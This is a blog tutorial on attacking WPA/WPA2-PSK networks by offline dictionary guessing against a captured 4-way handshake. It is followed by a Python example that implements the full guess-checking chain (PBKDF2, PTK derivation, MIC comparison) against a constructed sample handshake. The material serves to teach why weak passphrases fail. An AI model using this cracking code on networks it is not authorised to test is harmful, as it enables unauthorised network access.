Wi-Fu - Attacking WPA-PSK - Part 2
5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2
Category: WPA/2
Published on Saturday, 18 January 2014 19:30
Recap
The image below shows a basic flow of the information required to derive the
PSK and PTK for a WPA network.
A lot of information passes between the wireless client and the access
point. But when you think about it, you will realise that all of these parameters,
bar one, are sent in plaintext. An attacker silently sniffing the network traffic will
learn all of these values, except the original passphrase entered by the user.
Bruteforce
Because each guess requires computationally expensive operations, the process of
bruteforcing the passphrase is rather slow.
1. The attacker makes a guess at the passphrase (from a dictionary
or other wordlist source)
2. This passphrase is used with the SSID and put through the
PBKDF2 function, producing a PSK (which may or may not be
correct)
3. This PSK is used with the captured information from the 4-way
handshake and put through the PBKDF2 function again. This
produces a PTK.
4. The attacker uses this information to calculate a MIC - which is
then checked against the MIC in the captured packets.
5. If the MIC matches, the original passphrase was correct; if not, the
entire process is repeated with the next passphrase.
A Word on WPA2-PSK
Even though WPA2 uses different encryption schemes and functions,
the attack process for WPA2 is identical to WPA, because what we are
really attacking is a weak passphrase.
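The derivation chain from the Bruteforce steps and the WPA/WPA2 note above, as an added Python example (not code from the original page) that shows why passphrase strength is the only secret protecting the network. For step 3 it uses the PRF-512 construction (HMAC-SHA1) that IEEE 802.11i specifies for PTK derivation; the MAC addresses, nonces, EAPOL bytes and passphrases are constructed sample values, and the function names are hypothetical.

```python
import hashlib
import hmac
import time

def derive_pmk(passphrase, ssid):
    # Step 2: PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32-byte PSK.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    # Step 3: PRF-512 over values that all cross the air in plaintext.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]

def compute_mic(ptk, eapol_frame, wpa2):
    # Step 4: MIC keyed with the KCK (first 16 bytes of the PTK), computed over
    # the EAPOL-Key frame with its MIC field zeroed.
    # WPA uses HMAC-MD5; WPA2 uses HMAC-SHA1 truncated to 16 bytes.
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(ptk[:16], eapol_frame, digest).digest()[:16]

def guess_matches(guess, ssid, hs):
    # Steps 2-5 for a single candidate passphrase.
    ptk = derive_ptk(derive_pmk(guess, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])
    return hmac.compare_digest(compute_mic(ptk, hs["eapol"], hs["wpa2"]), hs["mic"])

def constructed_handshake(passphrase, ssid, wpa2):
    # Constructed stand-in for a captured handshake (not real traffic).
    hs = {"ap_mac": bytes.fromhex("020000000001"),
          "sta_mac": bytes.fromhex("020000000002"),
          "anonce": bytes(range(32)), "snonce": bytes(range(32, 64)),
          "eapol": b"\x01\x03\x00\x75" + bytes(117), "wpa2": wpa2}
    ptk = derive_ptk(derive_pmk(passphrase, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])
    hs["mic"] = compute_mic(ptk, hs["eapol"], wpa2)
    return hs

if __name__ == "__main__":
    hs = constructed_handshake("correct horse battery", "ExampleNet", wpa2=True)
    start = time.perf_counter()
    for guess in ["password123", "letmein2014", "correct horse battery"]:
        print(guess, "->", guess_matches(guess, "ExampleNet", hs))
    print("seconds per guess: %.4f" % ((time.perf_counter() - start) / 3))
```

The per-guess time is dominated by the 4096 PBKDF2 iterations in step 2, and because the SSID is the salt, that work has to be redone for every network name.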